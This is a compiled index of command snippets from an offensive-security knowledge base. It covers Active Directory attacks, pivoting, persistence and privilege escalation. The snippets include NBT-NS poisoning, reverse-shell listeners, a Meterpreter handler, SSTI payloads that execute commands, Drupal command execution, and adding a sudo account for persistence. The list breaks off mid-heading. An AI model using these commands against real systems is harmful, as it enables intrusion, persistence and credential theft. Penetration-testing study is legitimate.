### Install Impacket
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Active-Directory/Initial-Attack-Vectors/Kerberoasting/From-Linux.md
Installs the Impacket library using pip. This command requires root privileges and ensures the tools are available system-wide.
```bash
sudo python3 -m pip install .
```
--------------------------------
### Manage systemd Service Lifecycle
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Linux-Environment/Establishing-Persistence/Startup-Scripts.md
This section covers the systemd commands necessary to manage a newly created service, including reloading the daemon to recognize the service, enabling it to start on boot, and starting it manually.
```bash
systemctl daemon-reload
```
```bash
systemctl enable your_service_name.service
```
```bash
systemctl start your_service_name.service
```
```bash
systemctl status your_service_name.service
```
```bash
journalctl -u your_service_name.service
```
--------------------------------
### Navigate to Impacket Directory
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Active-Directory/Initial-Attack-Vectors/Kerberoasting/From-Linux.md
Changes the current working directory to the cloned Impacket repository. This is necessary to run installation and usage commands.
```bash
cd impacket
```
--------------------------------
### Start Chisel Server
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Linux-Environment/Pivoting-Tunneling-and-Port-Forwarding/Pivoting/Chisel.md
This command executes the Chisel server with specific configurations. It makes the binary executable, starts the server in verbose mode, listens on port 1234, and enables SOCKS5 proxying.
```bash
chmod +x chisel && ./chisel server -v -p 1234 --socks5
```
--------------------------------
### Install Python MkDocs and Run Local Server
Source: https://github.com/hack-fast/hackfast/blob/main/README.md
Commands to install Python, create a virtual environment, activate it, install mkdocs-material, clone the Hackfast repository, and run the local development server.
```bash
# Install Python MkDocs requires Python 3.7 or higher
python3 --version
# Create a virtual environment (recommended)
python3 -m venv .venv
# Activate the virtual environment
# On Linux/macOS:
source .venv/bin/activate
# On Windows:
.venv\Scripts\activate
# Install dependencies
pip install mkdocs-material
# Clone the repository
git clone https://github.com/hack-fast/Hackfast.git
# Navigate into the Hackfast project directory
cd Hackfast
# Run the local development server
mkdocs serve
```
--------------------------------
### Install and Run Responder
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Active-Directory/Initial-Attack-Vectors/NBT-NS-Poisoning/From-Linux.md
Steps to install Responder using apt and run it to listen for network requests. Replace 'ens224' with your actual network interface name.
```bash
sudo apt update
```
```bash
sudo apt install responder
```
```bash
sudo responder -I ens224
```
--------------------------------
### Run Ligolo-ng Proxy
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Linux-Environment/Pivoting-Tunneling-and-Port-Forwarding/Pivoting/Ligolo-ng.md
Starts the Ligolo-ng proxy on the attacker machine. The '-selfcert' or '-autocert' flags are used for certificate handling during the proxy setup.
```bash
./proxy -selfcert
```
```bash
./proxy -autocert
```
--------------------------------
### BloodHound Data Collection and Management
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Active-Directory/Initial-Scanning-&-Enumeration/Credentialed-Enumeration/From-Linux.md
Commands for executing BloodHound Python data collector, starting Neo4j service, and launching the BloodHound GUI. Also includes an example for data extraction from JSON.
```bash
sudo bloodhound-python -u '[USERNAME]' -p '[PASSWORD]' -ns [IP-ADDRESS] -d [DOMAIN] -c all
```
```bash
sudo neo4j start
```
```bash
bloodhound
```
```bash
/opt/Windows/BloodHound_Python/bloodhound.py -d hutch.offsec -u fmcsorley -p CrabSharkJellyfish192 -c all -ns 192.168.219.122
```
```bash
cat 202020020_user.json | jq '.data[].Properties.name' | cut -d '"' -f 2 > useremail.txt
```
```bash
cat useremail.txt | cut -d '@' -f 1 > users.list
```
--------------------------------
### Masscan Workflow Examples
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Network/tools/masscan.md
Provides practical examples of combining Masscan options for common reconnaissance tasks, such as fast subnet scanning, targeted scans with exclusions, and full port scans.
```bash
# Fast recon of top 100 ports on a /16 subnet
masscan 192.168.0.0/16 --top-ports 100 --rate 5000 -oJ scan.json
# Targeted scan of known ports with exclusions
masscan -p22,80,443 -iL targets.txt --exclude 192.168.1.1 --rate 1000 -oX results.xml
# Full port scan on one host for deeper analysis
masscan 10.0.0.5 -p0-65535 --rate 2000 -oJ fullscan.json
```
--------------------------------
### Install Impacket Package
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Active-Directory/Initial-Attack-Vectors/ASREPRoasting/From-Linux.md
Installs the Impacket library using apt-get. This is a prerequisite for using Impacket tools like GetNPUsers.py.
```bash
sudo apt-get update
sudo apt-get install python3-impacket
```
--------------------------------
### GoDork Installation and Usage
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Web-Application/Web-Enumeration/Google-Dorks.md
Steps to install and utilize GoDork, a versatile tool for scanning multiple search engines. It includes cloning, building, and examples of performing dork scans with different parameters.
```bash
sudo git clone https://github.com/dwisiswant0/go-dork.git
cd go-dork
sudo go build
sudo cp go-dork /usr/local/bin/
go-dork -q "inurl:'testTarget'"
go-dork -e google -q ".php?id="
cat dorks.txt | go-dork -p 5
```
--------------------------------
### Masscan Target Selection Examples
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Network/tools/masscan.md
Demonstrates various ways to specify targets for Masscan, including single IPs, IP ranges, domain names, CIDR notation, and loading targets from a file.
```bash
masscan 192.168.1.10
masscan 192.168.1.10 192.168.1.20
masscan 192.168.1.10-192.168.1.100
masscan example.com
masscan 10.0.0.0/8
masscan -iL targets.txt
masscan --exclude 192.168.1.1
masscan --excludefile exclude.txt
```
--------------------------------
### View Services and Drivers
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Windows-Environment/Privilege-Escalation/System-Enumeration.md
List running processes, active services, and installed drivers using command-line and PowerShell. Includes methods to get service status and detailed service information.
```cmd
tasklist /v /fi "username eq system"
```
```cmd
sc query
```
```cmd
driverquery
```
```powershell
Get-Service
```
```powershell
Get-WmiObject -Class Win32_Service
```
--------------------------------
### Build Ligolo-ng Agent and Proxy
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Linux-Environment/Pivoting-Tunneling-and-Port-Forwarding/Pivoting/Ligolo-ng.md
Compiles the Ligolo-ng agent and proxy binaries from the source code. Requires Go to be installed on the system.
```bash
cd ligolo-ng && go build -o agent cmd/agent/main.go && go build -o proxy cmd/proxy/main.go
```
--------------------------------
### Get Service Configuration using sc qc
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Windows-Environment/Privilege-Escalation/Service-Exploits/Insecure-Service-Permissions/Service-Enumeration.md
Uses the sc qc command to retrieve the configuration details of a specific service, including its start mode and binary path.
```batch
sc qc daclsvc
```
--------------------------------
### List Installed Programs
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Windows-Environment/Privilege-Escalation/System-Enumeration.md
Enumerate installed programs and applications using file system enumeration, WMI queries, registry lookups, and the Get-Package cmdlet. Includes checking for installed AV products.
```powershell
Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,LastWriteTime
```
```cmd
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
```
```powershell
Get-WmiObject -Class Win32_Product | Select-Object -Property Name,Version
```
```powershell
Get-ItemProperty -Path "HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate
```
```powershell
Get-Package
```
--------------------------------
### Start and Check LXD Instance Status
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Linux-Environment/Privilege-Escalation/Service-Based/LXD.md
Starts the LXD container named 'test' and then displays its current running state and information.
```bash
lxc start test
lxc info test
```
--------------------------------
### Clone Impacket Repository
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Active-Directory/Initial-Attack-Vectors/Kerberoasting/From-Linux.md
Clones the Impacket repository from GitHub to your local machine. This is the first step to setting up the Impacket tools for use.
```bash
git clone https://github.com/SecureAuthCorp/impacket.git
```
--------------------------------
### Start Ruby HTTP Server
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Windows-Environment/File-Transfer/Download-Operations.md
Starts a simple HTTP server using Ruby's httpd module. This command serves files from the current directory on the specified port. It's a lightweight solution for file sharing.
```ruby
ruby -run -e httpd . -p 8000
```
--------------------------------
### Start Apache HTTP Server
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Windows-Environment/File-Transfer/Download-Operations.md
Starts the Apache web server, typically used for serving web content. Files placed in the Apache web directory (e.g., /var/www/html) can be accessed via HTTP. This requires the Apache service to be running.
```bash
sudo systemctl start apache2
```
--------------------------------
### Test WinRM Login and Execute Command with crackmapexec
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Network/ports/5985.md
Tests WinRM connectivity with provided credentials and executes a specified command. Useful for verifying access and understanding user context on the remote machine. It specifically uses the 'whoami' command in this example.
```bash
crackmapexec winrm [TARGET-IP] -u [USERNAME] -p [PASSWORD] -x "whoami"
```
--------------------------------
### Start Service and Netcat Listener
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Windows-Environment/Privilege-Escalation/Service-Exploits/Insecure-Service-Permissions/Service-Exploitation.md
This snippet shows how to start a configured Windows service and simultaneously set up a Netcat listener on the attacker machine. The listener waits for incoming connections on the specified port.
```bash
sc start daclsvc
```
```bash
sudo rlwrap -cAr nc -lvnp 1338
```
--------------------------------
### GooFuzz Installation and Usage
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Web-Application/Web-Enumeration/Google-Dorks.md
Instructions for installing and using GooFuzz, a Go-based tool for efficient Google Dorking. It covers cloning the repository, building the binary, and running searches with various options.
```bash
sudo git clone https://github.com/m3n0sd0n4ld/GooFuzz
cd GooFuzz
sudo cp GooFuzz /usr/local/bin/
GooFuzz -h
GooFuzz -t target.com -e pdf,doc,bak
```
--------------------------------
### Host LinPEAS Script with Python
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Linux-Environment/Pivoting-Tunneling-and-Port-Forwarding/Port-Forwarding/Enumeration.md
Starts a simple HTTP server using Python 3 on port 8000. This allows the LinPEAS script to be hosted locally for transfer to a target machine.
```python
python3 -m http.server 8000
```
--------------------------------
### Masscan Output Format Examples
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Network/tools/masscan.md
Demonstrates how to save Masscan scan results in different formats, including JSON, XML, and a simple list format, suitable for automation and analysis.
```bash
masscan -p80 1.2.3.4 -oJ output.json
masscan -p80 1.2.3.4 -oX output.xml
masscan --output-format list
```
--------------------------------
### Upload Files via WebDAV
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Windows-Environment/File-Transfer/Upload-Operations.md
Details uploading files using the Web Distributed Authoring and Versioning (WebDAV) protocol. This includes installing a WebDAV server, starting it, and copying files.
```bash
sudo pip3 install wsgidav cheroot
```
```bash
sudo wsgidav --host=0.0.0.0 --port=8081 --root=/tmp --auth=anonymous
```
```bash
dir \[IP-ADDRESS]\DavWWWRoot
```
```bash
copy C:\Temp\file.zip \[IP-ADDRESS]\DavWWWRoot\
```
--------------------------------
### Start Python 2 HTTP Server
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Windows-Environment/File-Transfer/Download-Operations.md
Starts a simple HTTP server using Python 2 on a specified port. This allows for easy file sharing and downloading from the directory where the server is initiated. It's a quick way to serve files locally.
```bash
python -m SimpleHTTPServer 8000
```
--------------------------------
### Install Impacket
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Active-Directory/Initial-Attack-Vectors/DCSync/From-Linux.md
Installs Impacket, a Python library for working with network protocols, which is necessary for extracting password hashes.
```bash
sudo apt-get update
sudo apt-get install python3-pip
pip3 install impacket
```
--------------------------------
### Start PHP HTTP Server
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Windows-Environment/File-Transfer/Download-Operations.md
Starts an HTTP server using PHP's built-in web server functionality. This is useful for serving web content or files from a directory. It binds to all network interfaces on the specified port.
```bash
php -S 0.0.0.0:8000
```
--------------------------------
### Start Service
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Windows-Environment/Privilege-Escalation/Service-Exploits/Weak-Registry-Permissions/Registry-Exploitation.md
Starts a Windows service by its name. If the ImagePath has been compromised, this command will execute the malicious binary.
```bash
net start regsvc
```
--------------------------------
### Start Apache Server and Download File
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Linux-Environment/File-Transfer/Download-Operations.md
Covers copying a file to the Apache web directory, starting the Apache server, and downloading the file using wget or curl.
```bash
cp nc.exe /var/www/html
```
```bash
sudo systemctl start apache2
```
```bash
wget http://[IP-ADRESS]:8000/file.txt
```
```bash
curl –O https://[IP-ADRESS]:8000/file.txt
```
--------------------------------
### Get Exim Binary Help Information
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Linux-Environment/Privilege-Escalation/SUID-SGID-Executables/Exploiting-Vulnerable-SUID-Binaries.md
Retrieves the help information for the Exim binary to understand its functionalities and confirm it's not a custom binary. This step is crucial for initial reconnaissance.
```bash
/usr/sbin/exim-4.84-3 --help
```
--------------------------------
### Host PowerShell Script with Python (Python Command)
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Windows-Environment/Privilege-Escalation/Token-Impersonation/SeBackupPrivilege-SeRestorePrivilege.md
This command starts a simple HTTP server using Python in the current directory. This is used to host the downloaded PowerShell script so it can be transferred to a target machine. It requires Python to be installed and accessible. The server listens on port 80.
```python
python -m http.server 80
```
--------------------------------
### Telnet POP3 Interaction Example
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Network/ports/110.md
This example demonstrates a manual interaction with a POP3 server using Telnet. It shows a client connecting, authenticating with USER and PASS commands, listing emails with LIST, retrieving a message with RETR, and the server's responses.
```text
hackfast@kali:~$ telnet [IP-ADRESS] 110
+OK alpha POP3 service (JAMES POP3 Server 2.3.2) active
USER mrrobot
+OK
PASS secretpassword
+OK Welcome mrrobot
list
+OK 2 1807
1 786
2 1021
retr 1
+OK Retrieving message
From: mrrobot@hackfa.st
Hello Mr. Robot,
Below is your remote desktop login info. Please remember it!
username: mrrobot
password: S3cur3P@ssw0rd
```
--------------------------------
### Build Chisel Binary
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Linux-Environment/Pivoting-Tunneling-and-Port-Forwarding/Pivoting/Chisel.md
This command navigates into the Chisel directory and compiles the source code into an executable binary. This is necessary if you do not use a pre-built version.
```bash
cd chisel && go build
```
--------------------------------
### Find Apache Default Installation Pages
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Web-Application/Web-Enumeration/Google-Dorks.md
This Google Dork searches for the default installation page of Apache on Ubuntu servers. It helps identify unsecured servers that require immediate configuration to prevent potential security risks.
```Google Dorks
intitle:"Apache2 Ubuntu Default Page: It works"
```
--------------------------------
### Install ptunnel-ng and Dependencies
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Linux-Environment/Pivoting-Tunneling-and-Port-Forwarding/Pivoting/ICMP-Tunneling-with-ptunnel-ng.md
Navigates into the cloned ptunnel-ng directory, installs necessary build dependencies (build-essential, autoconf, automake), and runs the autogen.sh script to prepare for compilation.
```bash
cd ptunnel-ng && sudo apt install build-essential autoconf automake && sudo ./autogen.sh
```
--------------------------------
### Host Binary with Python HTTP Server
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Windows-Environment/Privilege-Escalation/Service-Exploits/Weak-Registry-Permissions/Registry-Exploitation.md
Starts a simple Python HTTP server to host the generated executable file. This allows the binary to be downloaded from a remote machine.
```python
python -m SimpleHTTPServer 8001
```
--------------------------------
### Create and Configure Shell Script for Startup
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Linux-Environment/Establishing-Persistence/Startup-Scripts.md
This section details the process of creating a shell script, making it executable, and configuring it to run automatically at system startup using traditional Linux runlevels.
```bash
nano /path/to/your_script.sh
```
```bash
chmod 755 /path/to/your_script.sh
```
```bash
update-rc.d /path/to/your_script.sh defaults
```
```bash
ls -l /path/to/your_script.sh
```
```bash
ls -l /etc/rc*.d/*your_script.sh
```
--------------------------------
### Test New User Account
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Linux-Environment/Establishing-Persistence/Add-Account.md
Switches to the newly created user account using 'su -' to test its functionality. The 'whoami' command is then used to confirm the successful user switch.
```bash
su - hackfast
```
```bash
whoami
```
--------------------------------
### Start HTTP Server and Download File with Ruby
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Linux-Environment/File-Transfer/Download-Operations.md
Provides commands to start a Ruby HTTP server and download a file using Ruby's Net::HTTP module.
```bash
ruby -run -e httpd . -p 8000
```
```ruby
ruby -e 'require "net/http"; File.write("file.txt", Net::HTTP.get(URI.parse("http://[IP-ADDRESS]:8000")))'
```
--------------------------------
### Create a systemd Service for Script Execution
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Linux-Environment/Establishing-Persistence/Startup-Scripts.md
This snippet provides the content for a systemd service file, defining how a script should be managed by systemd, including its description, dependencies, execution commands, and restart behavior.
```systemd
[Unit]
Description=Your Script Service
After=network.target
[Service]
ExecStart=/path/to/your_script.sh
ExecReload=/bin/kill -HUP $MAINPID
ExecStop=/bin/kill -SIGINT $MAINPID
Restart=on-failure
User=root
[Install]
WantedBy=multi-user.target
```
--------------------------------
### Start Netcat Listener
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Windows-Environment/Privilege-Escalation/Service-Exploits/Insecure-Permissions-Executable/Service-Exploitation.md
Starts a simple netcat listener on the specified port. Useful as an alternative to Metasploit's handler for basic shell interactions.
```bash
sudo rlwrap -cAr nc -lvnp 1338
```
--------------------------------
### Unattend.xml AutoLogon Example
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Windows-Environment/Privilege-Escalation/Credential-Hunting.md
This XML snippet illustrates the AutoLogon configuration within an Unattend.xml file. It shows how to specify the username, password (in plain text in this example), and enable automatic logon.
```xml
HackFast_p@ss
true
true
2
Administrator
```
--------------------------------
### Inspect Inveigh Cmdlet Parameters (PowerShell)
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Active-Directory/Initial-Attack-Vectors/NBT-NS-Poisoning/From-Windows.md
This code retrieves and displays the available parameters for the `Invoke-Inveigh` cmdlet, allowing users to understand the configuration options.
```powershell
(Get-Command Invoke-Inveigh).Parameters
```
--------------------------------
### Start HTTP Server and Download File with Python 3
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Linux-Environment/File-Transfer/Download-Operations.md
Illustrates starting an HTTP server in Python 3 and downloading a file using Python's urllib.request module.
```bash
python3 -m http.server 8000
```
```python
python3 -c 'import urllib.request;urllib.request.urlretrieve("http://[IP-ADRESS:8000]/file.txt", "file.txt")'
```
--------------------------------
### Create New User with adduser Command
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Linux-Environment/Establishing-Persistence/Add-Account.md
A recommended method for creating a new user. The 'adduser' command simplifies the process by prompting for necessary information such as password and user details. It handles file creation and permission setup automatically.
```bash
sudo adduser hackfast
```
--------------------------------
### Clone Ligolo-ng Repository
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Linux-Environment/Pivoting-Tunneling-and-Port-Forwarding/Pivoting/Ligolo-ng.md
Clones the Ligolo-ng repository from GitHub. This is the first step to obtain the source code for building the agent and proxy.
```bash
git clone https://github.com/nicocha30/ligolo-ng.git
```
--------------------------------
### Start HTTP Server and Download File with Python 2
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Linux-Environment/File-Transfer/Download-Operations.md
Demonstrates how to initiate a simple HTTP server in Python 2 and download a file from it using Python's urllib module.
```bash
python -m SimpleHTTPServer 8000
```
```python
python2 -c 'import urllib;urllib.urlretrieve ("http://[IP-ADRESS]:8000/file.txt", "file.txt")'
```
--------------------------------
### Thymeleaf (Java) SSTI Payloads
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Web-Application/Web-Exploit/Injections/Server-Side-Injections/Checklist/SSTI.md
SSTI testing payloads for Thymeleaf, a Java template engine. These examples focus on expression evaluation and attempting to execute system commands.
```Java
${7*7}
```
```Java
th:text="${T(java.lang.Runtime).getRuntime().exec('ls')}"
```
--------------------------------
### Run InveighZero (C# Version)
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Active-Directory/Initial-Attack-Vectors/NBT-NS-Poisoning/From-Windows.md
This snippet shows how to execute the InveighZero executable. It also mentions entering interactive mode and specific commands for retrieving captured NTLMv2 hashes and username information.
```bash
.\Inveigh.exe
```
```bash
GET NTLMV2UNIQUE
```
```bash
GET NTLMV2USERNAMES
```
--------------------------------
### Velocity (Java) SSTI Payloads
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Web-Application/Web-Exploit/Injections/Server-Side-Injections/Checklist/SSTI.md
Examples of SSTI payloads for Apache Velocity, a Java template engine. These payloads test variable assignment and attempt to execute system commands.
```Java
#set($x = 7 * 7)
```
```Java
$class.inspect("java.lang.Runtime").newInstance().exec("ls")
```
--------------------------------
### Check Installed Applications (Registry/PowerShell)
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Windows-Environment/Privilege-Escalation/System-Enumeration.md
Methods to query for installed applications on a Windows system. The registry method uses the 'reg query' command, while the PowerShell method uses 'Get-ItemProperty' targeting the Uninstall registry path.
```cmd
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall
```
```powershell
Get-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\*"
```
--------------------------------
### CrackMapExec Local Account Connection
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Active-Directory/Initial-Scanning-&-Enumeration/Tools/Linux/CrackMapExec.md
Demonstrates connecting to target systems using a local account with CrackMapExec. Includes options for specifying username, password, and using a null session.
```bash
crackmapexec smb [IP-ADDRESS] -u '[USERNAME]' -p '[PASSWORD]' --local-auth
```
```bash
crackmapexec smb [IP-ADDRESS] -u "" -p ""
```
--------------------------------
### Connect Chisel Client
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Linux-Environment/Pivoting-Tunneling-and-Port-Forwarding/Pivoting/Chisel.md
This command initiates the Chisel client on the attack host, connecting to the Chisel server at the specified IP address and port. It then sets up a SOCKS proxy.
```bash
./chisel client -v 10.129.236.111:1234 socks
```
--------------------------------
### Twig (PHP) SSTI Payloads
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Web-Application/Web-Exploit/Injections/Server-Side-Injections/Checklist/SSTI.md
Payloads tailored for identifying and exploiting SSTI in Twig, a popular templating engine for PHP. These examples test basic functionality and access to environment variables.
```PHP
{{7*7}}
```
```PHP
{{_self.env.globals}}
```
--------------------------------
### Verify and Grant Sudo Privileges
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Linux-Environment/Establishing-Persistence/Add-Account.md
Verifies the new user entry in the /etc/passwd file using 'cat' and 'grep'. It then grants the new user sudo privileges by adding them to the 'sudo' group using 'usermod'.
```bash
cat /etc/passwd | grep 'hackfast'
```
```bash
sudo usermod -aG sudo hackfast
```
--------------------------------
### Change Existing Scheduled Task Properties (schtasks)
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Windows-Environment/Establishing-Persistence/Scheduled-Tasks.md
Modifies the properties of an existing scheduled task named 'MyStartupTask'. This example changes the trigger to daily and sets the start time to 09:00. Ensure the task name is accurate.
```batch
schtasks /change /tn "MyStartupTask" /sc daily /st 09:00
```
--------------------------------
### Connect to RPC Server using rpcclient
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Network/ports/135.md
Demonstrates how to establish a connection to an RPC server using rpcclient. It covers connecting with null authentication and with provided credentials. The tool simplifies remote procedure execution by abstracting network complexities.
```bash
# Connect to RPC server using rpcclient on port 135/TCP with null (anonymous) authentication
rpcclient -U "" -N [TARGET-IP]
rpcclient -U "[USERNAME]" [TARGET-IP] # With creds
```
--------------------------------
### FFUF Directory Discovery
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Web-Application/Web-Enumeration/Directory-Brute-Forcing.md
FFUF (Fuzz Faster U Fool) is a web fuzzer written in Go. This example shows its basic usage for directory discovery with a common wordlist.
```bash
ffuf -u [TARGET-URL]/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
```
--------------------------------
### Copy Executable to User-Specific Startup Folder (Batch)
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Windows-Environment/Establishing-Persistence/Startup-Folder.md
Copies a specified executable to the current user's Startup folder, ensuring it runs on login. This relies on the 'copy' command and requires the correct path to the executable and the user's Startup folder.
```batch
copy path\to\your\executable.exe "C:\Users\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\"
```
--------------------------------
### Execute Commands via Drupal Filter Module (GET Request)
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Web-Application/Common-Applications/cms/Drupal.md
After setting up the PHP code execution in a Drupal page, this example shows how to execute a command (e.g., 'id') by appending it as a query parameter to the page's URL.
```http
http://[DRUPAL-DOMAIN]/node/1?cmd=id
```
--------------------------------
### Get OS Information using PowerShell
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Windows-Environment/Privilege-Escalation/System-Enumeration.md
Fetch operating system details using PowerShell cmdlets. This includes general OS information and more comprehensive system details.
```powershell
Get-WmiObject -Class Win32_OperatingSystem
```
```powershell
Get-ComputerInfo
```
--------------------------------
### Copy Executable to All Users Startup Folder (Batch)
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Windows-Environment/Establishing-Persistence/Startup-Folder.md
Copies a specified executable to the Startup folder for all users, ensuring it runs on login for any user account. This uses the 'copy' command and requires the correct path to the executable and the global Startup folder.
```batch
copy path\to\your\executable.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\"
```
--------------------------------
### Masscan Port Scanning Options
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Network/tools/masscan.md
Shows how to specify ports for scanning, from individual ports to full port ranges, and how to enable banner grabbing for service information.
```bash
masscan -p80,443 10.0.0.1
masscan -p0-65535 10.0.0.1
masscan --ports 21,22,23,80,443
masscan --banners
```
--------------------------------
### Clone Chisel Repository
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Linux-Environment/Pivoting-Tunneling-and-Port-Forwarding/Pivoting/Chisel.md
This command clones the official Chisel repository from GitHub. It is the first step to obtain the Chisel source code for building the network tool.
```bash
git clone https://github.com/jpillora/chisel.git
```
--------------------------------
### Load and Run Inveigh Module (PowerShell)
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Active-Directory/Initial-Attack-Vectors/NBT-NS-Poisoning/From-Windows.md
This snippet demonstrates how to load the Inveigh PowerShell module and execute it with specific parameters to enable LLMNR, NBNS, console output, and file output.
```powershell
Import-Module .\Inveigh.ps1
Invoke-Inveigh -LLMNR Y -NBNS Y -ConsoleOutput Y -FileOutput Y
```
--------------------------------
### List Network Interfaces and IPs
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Linux-Environment/Privilege-Escalation/Strategy.md
Displays network interface information, including IP addresses. Essential for understanding the network environment.
```bash
ifconfig
```
```bash
ip a
```
--------------------------------
### Restart Service using net command
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Windows-Environment/Privilege-Escalation/Service-Exploits/Insecure-Permissions-Executable/Service-Exploitation.md
Starts a Windows service named 'filepermsvc' using the 'net start' command. This is an alternative to the 'sc start' command for initiating service execution.
```cmd
net start filepermsvc
```
--------------------------------
### Create WMI Event Filter (PowerShell)
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Windows-Environment/Establishing-Persistence/WMI-Event-Subscription.md
Defines the conditions for triggering an event using WQL. This example filters for the creation of a 'notepad.exe' process within a 60-second window.
```powershell
New-CimInstance -Namespace root\subscription -ClassName __EventFilter -Property @{
Name = 'MyEventFilter';
EventNamespace = 'root\cimv2';
QueryLanguage = 'WQL';
Query = "SELECT * FROM __InstanceCreationEvent WITHIN 60
WHERE TargetInstance ISA 'Win32_Process'
AND TargetInstance.Name = 'notepad.exe'"
}
```
--------------------------------
### Set Up Netcat Listener
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Linux-Environment/Privilege-Escalation/Service-Based/Logrotate.md
This command starts a Netcat listener on your attacking machine, waiting for an incoming connection on the specified port (e.g., 9001).
```bash
nc -nlvp 9001
```
--------------------------------
### Set Up Netcat Listener
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Linux-Environment/Establishing-Persistence/Cron-Jobs.md
This command starts a Netcat listener on a specified port, waiting to receive incoming reverse shell connections.
```shell
nc -lvp 5556
```
--------------------------------
### Set up Metasploit Handler
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Windows-Environment/Privilege-Escalation/Token-Impersonation/SeDebugPrivilege.md
Configures and starts a Metasploit multi-handler to listen for incoming Meterpreter connections. It sets the payload, local host, and local port to match the generated payload.
```bash
msfconsole -x "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set LHOST tun0; set LPORT 9001; run"
```
--------------------------------
### Download and Host PowerShell Script with wget and Python
